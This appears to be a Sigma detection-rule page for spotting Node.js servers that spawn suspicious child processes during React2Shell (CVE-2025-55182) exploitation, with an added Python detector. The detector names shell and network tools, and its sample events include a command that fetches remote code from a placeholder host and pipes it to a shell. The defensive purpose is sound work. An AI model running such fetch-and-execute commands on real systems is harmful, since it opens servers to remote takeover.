Rule Info

Name: Linux Suspicious Child Process from Node.js - React2Shell
Author: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali
Description: Detects suspicious child processes spawned from Node.js server processes on Linux systems, potentially indicating remote code execution exploitation such as CVE-2025-55182 (React2Shell).
This rule specifically looks for exploitation of the vulnerability on Node.js servers where attackers abuse the Node.js child_process module to execute arbitrary system commands.
When execSync() or exec() is used, the command line usually contains a shell invocation followed by the suspicious command or script (e.g., /bin/sh -c <malicious-command>).
For other child_process methods, the Image field shows the spawned process directly.
Reference: none listed
Date: 2025-12-05 00:00:00
Modified: None
Id: c70834fa-fb9d-4aa0-9e7d-45ceed36f3f7
Tags: attack.execution attack.t1059 attack.initial-access attack.t1190 detection.emerging-threats cve.2025-55182
Type: Community Rule
Rule History

Author: Swachchhanda Shrawan Poudel
Title: Merge PR #5795 from @swachchhanda000 - Add new rules for CVE-2025-55182 / React2Shell
Date: 2025-12-10
Commit:
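The two detection paths described above (a shell invoked with -c by exec()/execSync(), versus the spawned binary appearing directly as Image), worked through as an added example that is not the rule's own Sigma logic or Nextron's code. The Sysmon-for-Linux style field names, the shell paths and the list of suspicious commands are assumptions chosen for this illustration, and the sample events are constructed.

```python
import re
import shlex
from typing import Optional

# Assumption: command basenames worth flagging when the parent is a Node.js server.
SUSPICIOUS = {"curl", "wget", "nc", "ncat", "chmod", "id", "whoami", "uname",
              "python", "python3", "perl", "base64", "sh", "bash"}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/sh", "/usr/bin/bash"}

def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]

def classify(event: dict) -> Optional[str]:
    """Return a short reason if the process-creation event matches, else None.
    Assumed Sysmon-for-Linux style fields: ParentImage, Image, CommandLine."""
    if basename(event.get("ParentImage", "")) not in {"node", "nodejs"}:
        return None  # only children of a Node.js process are in scope
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    if image in SHELLS:  # exec()/execSync(): shell -c <command>
        try:
            argv = shlex.split(cmdline)
        except ValueError:
            return "shell:unparseable-command-line"
        if "-c" in argv and argv.index("-c") + 1 < len(argv):
            script = argv[argv.index("-c") + 1]
            tokens = re.split(r"[\s;|&`$()]+", script)  # crude shell tokenizer
            hits = sorted({basename(t) for t in tokens if basename(t) in SUSPICIOUS})
            if hits:
                return "shell:" + ",".join(hits)
        return None
    if basename(image) in SUSPICIOUS:  # other methods: Image is the binary itself
        return "direct:" + basename(image)
    return None

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": "/usr/bin/node", "Image": "/bin/sh",
     "CommandLine": '/bin/sh -c "curl http://example.invalid/x | sh"'},
    {"ParentImage": "/usr/bin/node", "Image": "/usr/bin/id", "CommandLine": "id"},
    {"ParentImage": "/usr/sbin/nginx", "Image": "/bin/sh",
     "CommandLine": '/bin/sh -c "curl http://example.invalid/x"'},
    {"ParentImage": "/usr/bin/node", "Image": "/usr/bin/git", "CommandLine": "git rev-parse HEAD"},
]

def scan(events):
    """Return (index, reason) for every matching event."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]
```

Running scan(SAMPLE_EVENTS) flags only the first two events; the nginx-parented shell and the benign git call under node are left alone.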
